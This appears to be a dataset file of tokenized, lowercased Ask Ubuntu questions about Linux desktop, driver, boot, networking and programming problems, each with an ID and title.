517258	how to clear clipboard memory ?	how can i free up or clear clipboard memory after copying anything .
517262	unity not working in 14.04.01 lts , blank desktop	i installed ubuntu 14.04.01 lts as a dual boot installation ( the other os is win xp with sp 3 ) , but when i log in there is nothing on the desktop , just the background . my computer : intel d865perl , pentium 4 cpu ( 3 ghz ) , 3 gb ram , and nvidia quadro fx 500/600 graphics card . i have a harddrive with two partitions : one for the xp and one for ubuntu and it 's partitions . at first there was just black screen but i fixed that by installing the nvidia driver ( version 173.14.36 ) via tty . to my disappointment that did n't help much , since now only the cursor and the background are visible after logging in . no launcher , no top menu bar , nothing . when i click the right mouse button i get the menu and i can create a new folder which is visible . i can access the tty by pressing ctrl-alt-f1 i have reinstalled ubuntu once , but it did n't help . i have also updated it . what shoud i do ? should i install an older version of ubuntu ? i have no idea what is the cause of the problem . since this does n't seem to be a common problem could it be caused by my graphics card or by some other part of hardware ? this is my first time have been using ubuntu or any linux os . i have been looking for help from different forums . i tried this but it did n't help : sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install unity and this : sudo dpkg-reconfigure xserver-xorg sudo service lightdm stop sudo service lightdm start and this : sudo apt-get install compizconfig-settings-manager export display=:0 ccsm after which i pressed ctrl-alt-f7 and enabled `` ubuntu unity plugin '' but it did n't help and i have tried this : sudo apt-get install â-reinstall ubuntu-desktop sudo apt-get install unity and this : export display=:0.0 sudo dconf reset -f /org/compiz/ setsid unity after `` setsid unity '' there is flood of text mostly about compiz core loading and starting plugins . after loading and starting unirtyshell plugin the last lines are : warn [ date & time ] unity.screen uscreen.cpp:114 uscreen : :getmonitorname : failed to get monitor name for monitor0 warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have connection , waiting for it ... error [ date & time ] unity.debug.interface debugdbusinterface.cpp:216 unable to loadf entry point in libxpathselect : libxpathselect.so.1.4 : can not open shared object file : no such file or directory error [ date & time ] unityo ( appinfo2 ) < unknown > :0 g_file_monitor_set_rate_limit : assertion 'g_is_file_monitor ( monitor ) ' failed error [ date & time ] unity.launcher.icon.trash trashlaunchericon.cpp:66 could not create file monitor for trash uri : operation not supported warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.can onical.unity.launcher ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.session yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.screensaver ' yet as we do n't have connection , waiting for it ... compiz ( opengl ) - error : fbo is incomplete : gl : framebuffer unsupported ( 0x8cdd ) '' segmentation fault ( core dumped ) but sometimes i get these slightly different warnings/errors with the same commands as above : ( process:2259 ) : dconf-warning ** : failed to commit changes to dconf : error spawning command line 'dbus launch -- autolaunch=2c1ca3459751dc3dd92e131553fb7ce5 [ part missing ] ary_syntax -- close-stderr ' : child process killed by signal 43 [ this was repeatyed warn [ date & time ] unity.screen uscreen.cpp:114 uscreen : :getmonitorname : failed to get monitor name for monitor0 ( compiz:2259 ) : dconf-warning ** : failed to commit changes to dconf : error spawning command line 'dbus launch -- autolaunch=2c1ca3459751dc3dd92e131553fb7ce5 [ part missing ] ary_syntax -- close-stderr ' : child process killed by signal 43 warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have connection , waiting for it ... ( compiz:2259 ) : dconf-warning ** : failed to commit changes to dconf : error spawning command line 'dbus launch -- autolaunch=2c1ca3459751dc3dd92e131553fb7ce5 [ part missing ] ary_syntax -- close-stderr ' : child process killed by signal 43 ( compiz:2259 ) : dconf-warning ** : failed to commit changes to dconf : error spawning command line 'dbus launch -- autolaunch=2c1ca3459751dc3dd92e131553fb7ce5 [ part missing ] ary_syntax -- close-stderr ' : child process killed by signal 43 error [ date & time ] unity.debug.interface debugdbusinterface.cpp:216 unable to loadf entry point in libxpathselect : libxpathselect.so.1.4 : can not ope [ part missing ] ed object file : no such link or directory error [ date & time ] unityo ( appinfo2 ) < unknown > :0 g_file_monitor_set_rate_limit : assertion 'g_is_file_monitor ( monitor ) ' failed error [ date & time ] unity.launcher.icon.trash trashlaunchericon.cpp:66 could not create file monitor for trash uri : operation not supported warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.can onical.unity.launcher ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.session yet as we do n't have connection , waiting for it ... warn [ date & time ] unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.screensaver ' yet as we do n't have connection , waiting for it ... compiz ( opengl ) - error : fbo is incomplete : gl : framebuffer unsupported ( 0x8cdd ) '' segmentation fault ( core dumped ) after that i tried this : export display=:0.0 unity -- replace [ or ] unity -- reset-icons but i just get the same error/warning messages as with setsid unity and this one : unity -- reset i get error : the reset option is now deprecated and rm -rf ~/.config/compiz-1/compizconfig/* does nothing this is really annoying . update 1 : i tried the suggestion of andrea and added nomodeset parameter in command line in grub . ( i followed the instructions given by fossfreedom here ) unfortunatetly it did n't work , i get exactly the same view as earlier . but i realised that this means that the card and/or driver is not working . i also noticed the resolution of the folder i ccreated is quite low , so i guess this also means the graphics card somehow is not working . so i guess the problem is with the card and/or driver ? update 2 : i installed 12.04.05 version . now i can see the top bar and launcher on the left side of the screen , but unity is frozen . i installed nvidia 173 drivers , but it just got worse . more details here .
517263	grub takes forever to show up	i just installed ubuntu 14.04.1 lts on my macbook pro 5,3 . everything works fine so far except for grub . it takes 5-8 minutes to just show up . the rest of the boot process goes as expected . i 'm also using refit . i uploaded to output of dmesg and bootinfoscript . i really hope somebody has a solution for this . output of dmesg output of bootinfoscript
517266	laptop as second monitor for pc	i have n't found any solutions for my particular problem yet . my pc got windows 7 and my asus f552e has ubuntu 14.04 . i connected the laptop with my graphicscard on my pc to use the laptop as an second monitor . to switch screens i have to press on fn+f8 . the outcome is a black screen . the video card driver for my laptop is installed correctly and the pc is dected on my laptop . i also ca n't change the screen in the display nor in the amd catalyst center options . so , have i overseen something ? maybe someone had the same problem and got some solutions . greetings , daniel
517268	what exactly should i set as java_home ?	i am trying to make tomcat 7 working with eclipse , and i am not sure if my java_home is correct . ~ $ echo $ java_home /usr/lib/jvm/default-java and there is no such catalog ! i only have : ~ $ ls /usr/lib/jvm/ java-1.7.0-openjdk-amd64 java-7-openjdk-amd64 is my java_home correct ?
517269	ubuntu on motorola xoom tablet	can i replace andorid with ubuntu on the motorola xoom table , does this tablet support it ? thank you
517270	fix for xubuntu/xrdp tab/autocomplete in multi-user environment	there are a number of threads throughout the internet about the xubuntu/xfce/xrdp issue where tab/autocomplete does n't work in a remote session , and most eventually point back to this page for the solution : http : //codebangers.com/ ? p=134 . codebangers suggest using the gui , but here is the same solution sone in the terminal : ~ $ cp .config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml \ .config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml.bak ~ $ sed -i -e 's/ < property name= '' \ & lt ; super\ & gt ; tab '' type= '' string '' value= '' switch_window_key '' \/ > / < property name= '' \ & lt ; super\ & gt ; tab '' type= '' empty '' \/ > / ' \ .config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml the problem is , this only fixes the issue for the current user . my question is two fold : how do i fix this automatically for new users , so it works for them at first login ( similar to updated the default user in windows ) ? how do i fix this for multiple existing users ? thank you for your assistance .
517276	convert fb2 to txt	there are still a lot of devices that ca n't read fb2 and able to read txt . also , txt version could take much less space compared to uncompressed fb2 .
517282	sony xperia z1 - phone\andriod	is it possible to install ubuntu phone or ubuntu for andriod on my sony xperia z1 smartphone ? if yes , is it possible to rollback in case there are major stability issues ? thanks
517284	set include path to `eigen 3.2.2`	i installed eigen 3.2.2 , but i ca n't make it work . as far as i can tell my installation went fine and i have the folder eigen in the include folder , such that /usr/include/eigen . and eigen contains all the normal stuff : : /usr/include/eigen $ ls -1 array cholesky cholmodsupport cmakelists.txt core dense eigen ... however , when i try to compile my_project.cpp like this : g++ -std=c++11 -i/usr/include/eigen my_project.cpp -o my_exec i get this error : in file included from /usr/include/eigen/sparsecore:40:0 , from /usr/include/eigen/sparse:19 , from my_project.cpp:3 : /usr/include/eigen/src/sparsecore/sparsematrix.h : in instantiation of âeigen : :sparsematrix < _scalar , _flags , _index > : :sparsematrix ( const eigen : :sparsematrixbase < otherderived > & ) [ with otherderived = eigen : :sparseview < eigen : :matrix < double , -1 , -1 > > ; _scalar = int ; int _options = 1 ; _index = int ] â : my_project.cpp:27:63 : required from here /usr/include/eigen/src/sparsecore/sparsematrix.h:649:7 : error : static assertion failed : you_mixed_different_numeric_types__you_need_to_use_the_cast_method_of_matrixbase_to_cast_numeric_types_explicitly i get the same error if i try to compile : g++ -std=c++11 my_project.cpp -o my_exec which tells me that i am not including eigen in the include path correctly , but what am i doing wrong ? edit : my_project.cpp : # include < iostream > # include < eigen/dense > # include < eigen/sparse > using namespace eigen ; int main ( ) { matrixxd silly ( 6 , 3 ) ; silly < < 0 , 1 , 2 , 0 , 3 , 0 , 2 , 0 , 0 , 3 , 2 , 1 , 0 , 1 , 0 , 2 , 0 , 0 ; sparsematrix < int , rowmajor > sparse_silly = silly.sparseview ( ) ; std : :cout < < sparse_silly < < std : :endl ; return 0 ; } edit 2 : if i take out the sparse related code , everything works , so the path is getting included . however , sparse part does not work : i noticed that /usr/include/eigen/eigen looks like this : # include `` dense '' // # include `` sparse '' could that have something to do with it ? got it : sparsematrix < double , rowmajor > sparse_silly = silly.sparseview ( ) fixes the problem .
517285	what is the difference between free and vmstat commands ?	vmstat output : procs -- -- -- -- -- -memory -- -- -- -- -- -- -swap -- -- -- -io -- -- -system -- -- -- cpu -- -- r b swpd free buff cache si so bi bo in cs us sy id wa 1 1 0 1001568 84736 500928 0 0 47 30 36 63 1 0 99 1 free output : total used free shared buffers cached mem : 1918500 916592 1001908 0 84732 500576 -/+ buffers/cache : 331284 1587216 swap : 1948668 0 1948668 how total memory in vmstat is calculated ?
517286	could things be broken by adding a folder in /home	if i was to create a folder in /home with this command : sudo mkdir /home/newuser would it break anything because i did n't create it in the correct manner - adding a new user ? or would they system simply ignore it ( or not notice it is there ) ?
517287	i am confused about lmv	i tried to install ubuntu 14 and is working great but while installing i used lmv installation i am confused if my previous data is lost or now ? i dint do any kind of partition i cant go back to my previous version of os , windows 8.1 either ? what do do please help me someone i had a recovery drive too can i go back to windows ? i will be very greatful for your help please waiting : (
517288	how do i bypass the osx bootloader screen when booting ubuntu installed on macbook	i am running ubuntu 14.04 ( no osx partition ) on a macbook pro , when i boot , i have to hold option and then select my ubuntu partition - which is labelled as windows . is there a way to bypass this ?
517291	syncing zimbra mail with evolution/ tb on port 443	the place where i am working has a strict ban on smtp/imap mode of email transport . they only support mails via webmail clients . my mail server is a zimbra one , and can be accessed via the zimbra linux desktop application nicely . the settings say it uses 443 to access the mail server i was wondering if the same could be done with thunderbird or evolution . i have seen , i can use the 443 setup on my android phone , if i use ms exchange account . can a same thing be done on ubuntu - thundberbird/evolution ?
517292	i lost my raid ... ( it wo n't load )	after plugging in an extra drive i lost my raid drives . in the drives gui it shows all of the raid drives as connected but when i go to start the raid it says : /dev/md/storage assembled from 1 drive - not enough to start the array . mdadm : no arrays found in config file or automatically could the drive dev directories be shifted making it so mdadm cant recognize the raid device ? any ideas/solutions would be greatly appreciated , thanks for your time .
517295	samba sharing on mapped share	so i 'm trying to do something that may not be possible . i am running ubuntu server 14.04 with the latest samba . i have a windows 2008 storage server nas with a shared drive , that i mount in fstab in my ubunutu . everything works great . my dilemma is that i want to share the mapped drive from ubuntu , not the little nas device with windows . the share does publish , but nobody can write to it . i 've tried everything , including forcing permissions . the windows box has been setup with easy access ( everyone ) permissions for simplicity . no matter what i do the system will not allow me to write files to it over the network . i realize i could just have network users write directly to the nas , which would work fine i suppose . i 'd rather control it all through the linux file server though , and more or less hide the nas from users . thought this would be simple through linux/samba , but apparently it ca n't be done through samba . the windows box is obviously ntfs which could have something to do with it . worst case , i could setup an iscsi connection between the nas and ubuntu . i 'd rather avoid that if possible though .
517298	how to start tomcat7 in eclipse 4.4 under ubuntu 14.04 ?	i have a problem . i have installed tomcat7 with apt-get and it works fine . but , when i try to start this server from eclipse it fails with error : could not load the tomcat server configuration at /servers/tomcat v7.0 server at localhost-config . the configuration may be corrupt or incomplete . could not load the tomcat server configuration at /servers/tomcat v7.0 server at localhost-config . the configuration may be corrupt or incomplete . what should i do ?
517301	error when compiling gtk-sharp ( only < glib.h > can be included directly )	i ran `` ./configure '' and it worked , then i ran `` make '' and i got this : libtool : compile : gcc -dhave_config_h -i . -i../.. -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dgtk_sharp_2_6 -dgtk_sharp_2_8 -dgtk_sharp_2_10 -dgtk_sharp_2_12 -i../.. -g -o2 -g -wall -wunused -wmissing-prototypes -wmissing-declarations -wstrict-prototypes -wmissing-prototypes -wnested-externs -wshadow -wpointer-arith -wno-cast-qual -wcast-align -wwrite-strings -mt list.lo -md -mp -mf .deps/list.tpo -c list.c -fpic -dpic -o .libs/list.o in file included from list.c:23:0 : /usr/include/glib-2.0/glib/glist.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/glist.h:32:0 , from list.c:23 : /usr/include/glib-2.0/glib/gmem.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/gmem.h:32:0 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gtypes.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/lib/x86_64-linux-gnu/glib-2.0/include/glibconfig.h:9:0 , from /usr/include/glib-2.0/glib/gtypes.h:32 , from /usr/include/glib-2.0/glib/gmem.h:32 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gmacros.h:33:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/gtypes.h:34:0 , from /usr/include/glib-2.0/glib/gmem.h:32 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gversionmacros.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/glist.h:33:0 , from list.c:23 : /usr/include/glib-2.0/glib/gnode.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ make [ 3 ] : * [ list.lo ] hata 1 make [ 3 ] : /home/alperen/gtk-sharp-2.12.10/glib/glue ' dizininden çıkılıyor make [ 2 ] : *** [ all-recursive ] hata 1 make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/glib ' dizininden çıkılıyor make [ 1 ] : * [ all-recursive ] hata 1 make [ 1 ] : `/home/alperen/gtk-sharp-2.12.10 ' dizininden çıkılıyor make : * [ all ] hata 2 full of `` glib.h '' errors.i can run `` make install '' after this but it does n't install it : making install in sources make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/sources ' dizinine giriliyor make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/sources ' dizinine giriliyor make [ 2 ] : install-exec-am ' için hiçbir şey yapılmadı . make [ 2 ] : install-data-am ' için hiçbir şey yapılmadı . make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/sources ' dizininden çıkılıyor make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/sources ' dizininden çıkılıyor making install in generator make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/generator ' dizinine giriliyor make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/generator ' dizinine giriliyor test -z `` /usr/local/bin '' || /bin/mkdir -p `` /usr/local/bin '' /usr/bin/install -c 'gapi2-codegen ' '/usr/local/bin/gapi2-codegen' test -z `` /usr/local/lib/gtk-sharp-2.0 '' || /bin/mkdir -p `` /usr/local/lib/gtk-sharp-2.0 '' /usr/bin/install -c -m 644 'gapi_codegen.exe ' '/usr/local/lib/gtk-sharp-2.0/gapi_codegen.exe' make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/generator ' dizininden çıkılıyor make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/generator ' dizininden çıkılıyor making install in parser make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/parser ' dizinine giriliyor make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/parser ' dizinine giriliyor test -z `` /usr/local/bin '' || /bin/mkdir -p `` /usr/local/bin '' /usr/bin/install -c 'gapi2-fixup ' '/usr/local/bin/gapi2-fixup' /usr/bin/install -c 'gapi2-parser ' '/usr/local/bin/gapi2-parser' test -z `` /usr/local/lib/gtk-sharp-2.0 '' || /bin/mkdir -p `` /usr/local/lib/gtk-sharp-2.0 '' /usr/bin/install -c -m 644 'gapi-fixup.exe ' '/usr/local/lib/gtk-sharp-2.0/gapi-fixup.exe' /usr/bin/install -c -m 644 'gapi-parser.exe ' '/usr/local/lib/gtk-sharp-2.0/gapi-parser.exe' test -z `` /usr/local/lib/gtk-sharp-2.0 '' || /bin/mkdir -p `` /usr/local/lib/gtk-sharp-2.0 '' /usr/bin/install -c 'gapi_pp.pl ' '/usr/local/lib/gtk-sharp-2.0/gapi_pp.pl' /usr/bin/install -c 'gapi2xml.pl ' '/usr/local/lib/gtk-sharp-2.0/gapi2xml.pl' test -z `` /usr/local/lib/pkgconfig '' || /bin/mkdir -p `` /usr/local/lib/pkgconfig '' /usr/bin/install -c -m 644 'gapi-2.0.pc ' '/usr/local/lib/pkgconfig/gapi-2.0.pc' make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/parser ' dizininden çıkılıyor make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/parser ' dizininden çıkılıyor making install in glib make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/glib ' dizinine giriliyor making install in glue make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/glib/glue ' dizinine giriliyor /bin/bash ../../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i../.. -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dgtk_sharp_2_6 -dgtk_sharp_2_8 -dgtk_sharp_2_10 -dgtk_sharp_2_12 -i../.. -g -o2 -g -wall -wunused -wmissing-prototypes -wmissing-declarations -wstrict-prototypes -wmissing-prototypes -wnested-externs -wshadow -wpointer-arith -wno-cast-qual -wcast-align -wwrite-strings -mt list.lo -md -mp -mf .deps/list.tpo -c -o list.lo list.c libtool : compile : gcc -dhave_config_h -i . -i../.. -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dgtk_sharp_2_6 -dgtk_sharp_2_8 -dgtk_sharp_2_10 -dgtk_sharp_2_12 -i../.. -g -o2 -g -wall -wunused -wmissing-prototypes -wmissing-declarations -wstrict-prototypes -wmissing-prototypes -wnested-externs -wshadow -wpointer-arith -wno-cast-qual -wcast-align -wwrite-strings -mt list.lo -md -mp -mf .deps/list.tpo -c list.c -fpic -dpic -o .libs/list.o in file included from list.c:23:0 : /usr/include/glib-2.0/glib/glist.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/glist.h:32:0 , from list.c:23 : /usr/include/glib-2.0/glib/gmem.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/gmem.h:32:0 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gtypes.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/lib/x86_64-linux-gnu/glib-2.0/include/glibconfig.h:9:0 , from /usr/include/glib-2.0/glib/gtypes.h:32 , from /usr/include/glib-2.0/glib/gmem.h:32 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gmacros.h:33:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/gtypes.h:34:0 , from /usr/include/glib-2.0/glib/gmem.h:32 , from /usr/include/glib-2.0/glib/glist.h:32 , from list.c:23 : /usr/include/glib-2.0/glib/gversionmacros.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ in file included from /usr/include/glib-2.0/glib/glist.h:33:0 , from list.c:23 : /usr/include/glib-2.0/glib/gnode.h:29:2 : error : # error `` only can be included directly . '' # error `` only can be included directly . '' ^ make [ 2 ] : * [ list.lo ] hata 1 make [ 2 ] : /home/alperen/gtk-sharp-2.12.10/glib/glue ' dizininden çıkılıyor make [ 1 ] : *** [ install-recursive ] hata 1 make [ 1 ] : /home/alperen/gtk-sharp-2.12.10/glib ' dizininden çıkılıyor make : * [ install-recursive ] hata 1
517302	how to force screen resolution when using a kvm	i just recently upgraded from 12.04 lts to 14.04.1 lts . the upgrade went smoothly without any major complaints . however , now whenever i switch to my work laptop using the kvm `` toggle '' and stay there long enough for my ubuntu screen to go to sleep , when i come back to ubuntu the screen resolution is very low . to get it back to `` normal '' , i only have to click on system settings and the screen will blank for a second and return to the normal resolution . i did n't have this problem in 12.04 and it 's the very same system that 's now on 14.04.1 . this is clearly a bug but hopefully someone will have a workaround . the kvm itself is just your garden variety 2 port kvm .
517306	upgrade to 14.04 results in system without desktop environment	yesterday i had a perfectly stable and responsive ubuntu 12 ( .10 ? ) on my dell xps3 . i made the mistake to say yes to the update to 14.04 . installation went fine , but after reboot i was looking at 5 blinking dots forever . it does n't seem to be able to bring up a display manager on it 's own accord . i can start lightdm from a console , but this seems to be fully software rendered and pretty unresponsive . also no sound , no choice for window manager ( i 'd like to stay at gnome classic . ) i had several coredumps in the process , and dialogs to report those , who all came to grief . starting gdm manually brings up a totally empty desktop with a logout / power button that does n't respond and nothing else whatsoever . a gdm log says it ca n't open drm device due to permissions . i do n't know what that means . i do n't want to know . i just want it to work . i just want an upgrade process to do its job . this is the fourth time i would need to reinstall since the upgrade process messes things up . and reinstalling again means two weeks of getting missing packages for my daily work . i see some related questions appearing in my side bar and i 'll peruse those , but i want you to know that i am miserable . becoming jealous of my wife 's windows laptop .
517307	how to set bright at maximum permanently ( i 've already got a solution , do anyone have a better one ? )	i have to reinstall ubuntu in my samsung n210 laptop , and now it wo n't let me set the brightness by hand . this seems to be something related to my bios but after looking for it , there 's no new release on samsung . i 've search all over the web , and found that the only thing to solve this is to manually set it this way : sudo setpci -s 00:02.0 f4.b=ff after that the bright is at maximum . now , this is my father 's pc , and the only way he can read with it , is with the brightness set on maximum . with this solution , i need to manually type it every single time i turn on the pc . i wanted to make those changes permanent , and the only thing that worked was this solution . ( i even tried this one ) that even says that the solution that actually worked in my case , is not safe enough . i just would like to know if there 's any new solution to this , or maybe some workaround , because it seems that every time i need to reinstall ubuntu i 'm going to bump into this ( i mean , i have this issue since 12.x version , and this is n't solved in new versions ) . any thoughts on this ?
517308	new install - does n't seem to recognize my graphics card	i have a nvidia 8800 card the installer seems to try and recognize it but i end up with a blank screen . is there a way to do a non-graphics install or something and grab the drivers and getting it running after it 's up . unfortunately my system board is actually a server board and there is no svideo at all . i mean basic bios and everything works . if i do a server install would that work but switching might stink but i 'd live with the pain doing it . i was hoping for maybe a hit this and a flag or something .
517310	how to use fileinputstream , fileoutputstream , buffered reader , buffer writer in ubuntu 14.04 's java ?	i use ubuntu 14.04 . there are big problems with fileinputstream , fileoutputstream , buffered reader , and buffer writer . in my project , when i try to copy data from file to file there is problem ! the code is : try { file filename=new file ( jttex1.gettext ( ) ) ; file nfile=new file ( jttex2.gettext ( ) ) ; if ( ! filename.exists ( ) ) { p ( `` file is not found '' ) ; return ; } if ( ! nfile.exists ( ) ) { p ( `` file is not found '' ) ; return ; } fileinputstream vinput=new fileinputstream ( filename ) ; fileoutputstream voutput=new fileoutputstream ( nfile ) ; jsizee.settext ( `` size '' +vinput.available ( ) ) ; byte [ ] buffer=new byte [ 50 ] ; int lenghtt=0 ; while ( ( vinput.read ( buffer ) ) > 0 ) ; { voutput.write ( buffer ) ; vinput.close ( ) ; voutput.close ( ) ; } } catch ( ioexception ee ) { system.err.println ( ee.getmessage ( ) ) ; } } this results in the text file : message there was problem when opning file `` /home/mizzz/netbeansprojects/fold2/fg2.txt '' the file you opened has some invalid characters if you continue this file corrupt this doucmunt you can also choose anothor character encoding and try again /00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/
517315	how can i switch windows without a history of which window was last accessed ?	hitting alt-tab repeatedly toggles between the two most recently used windows . i would like to be able to hit key stroke that will always move me to the next window in a list . i want to map this key to a key on my mouse , so the alt-tab-tab-tab-etc . method wo n't work for me .
517316	ubuntu 14.04 and dual layer dvd+r discs ?	does anyone know what ubuntu 14.04 's long problem with dual layer dvds ( specifically , memorex ) is caused by and how to fix it ? so far i have tried to use brasero and wodim to burn an iso imagine to a dual layer dvd+r disc with no success . i burned the same iso imagine to a `` regular '' memorex dvd+r without problem .
517317	server losing pppoe connection ?	hello , from a couple of days ago , i am experiencing strange behavior with by ubuntu server box . i have it conf as a gateway , with two nics and a pppoe connection to isp . everything works fine , until i get this msg in syslog : aug 28 22:07:45 gateway pppd [ 1028 ] : no response to 4 echo-requests aug 28 22:07:45 gateway pppd [ 1028 ] : serial link appears to be disconnected . aug 28 22:07:45 gateway pppd [ 1028 ] : connect time 188.1 minutes . aug 28 22:07:45 gateway pppd [ 1028 ] : sent 53583837 bytes , received 34345122 bytes . aug 28 22:07:51 gateway pppd [ 1028 ] : connection terminated . aug 28 22:07:51 gateway pppd [ 1028 ] : modem hangup aug 28 22:08:56 gateway pppd [ 1028 ] : timeout waiting for pado packets aug 28 22:08:56 gateway pppd [ 1028 ] : unable to complete pppoe discovery ifconfig clearly shows that i have lost the ppp interface : eth0 link encap : ethernet hwaddr 6c:62:6d : ad:61 : ff inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:9346 errors:0 dropped:0 overruns:0 frame:0 tx packets:5174 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:736900 ( 736.9 kb ) tx bytes:3048256 ( 3.0 mb ) eth1 link encap : ethernet hwaddr 00 : e0:52 : fa:22:13 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:42 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:134 errors:0 dropped:0 overruns:0 frame:0 tx packets:134 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10649 ( 10.6 kb ) tx bytes:10649 ( 10.6 kb ) pon/poff does n't help . and the strange thing is : when i do a full power cycle ( shutdown -p now , then manually starting the pc ) , everything is back to normal . ppp is there , until it hangs up again ! when i do a shutdown -r now , init 6 or reboot , ppp is not there . thanks upfront .
517319	which us international keyboard layout gives me all umlauts and sharp s ?	i would like to use a us keyboard layout . however , from time to time i need to type german umlauts and sharp s. all the us international keyboard layouts have left me unsatisfied . i am always either missing sharp s or a way to type the umlauts . does anyone have a configuration where they are able to use both sharp s and all umlauts with a us international keyboard layout ? if so , would you share how you achieved this ?
517321	uninstall ubuntu 14 and reinstall window 8.1	i have tried to uninstall and reload windows but i ca n't . i have tried everything in other posts and nothing seems to work . even tried to just clean partition and then reinstall got the grub rescue screen . even tried to do that did n't work . i have now reinstalled so can you give me step by step instructions on how to do it please . update i have discovered that windows 8.1 computers do not come with recovery discs . they have the software on a virtual drive on the hdd . when you get the machine you are supposed to do a back up of it on either several dvd 's or on a 16gb usb drive . the product code is part of the bios of the machine . so when you install ubuntu on a windows 8 machine you need to partition first ! the installer will not do it automatically for you . something i have found out to my cost as i now have to pay for a recovery disc from acer . : (
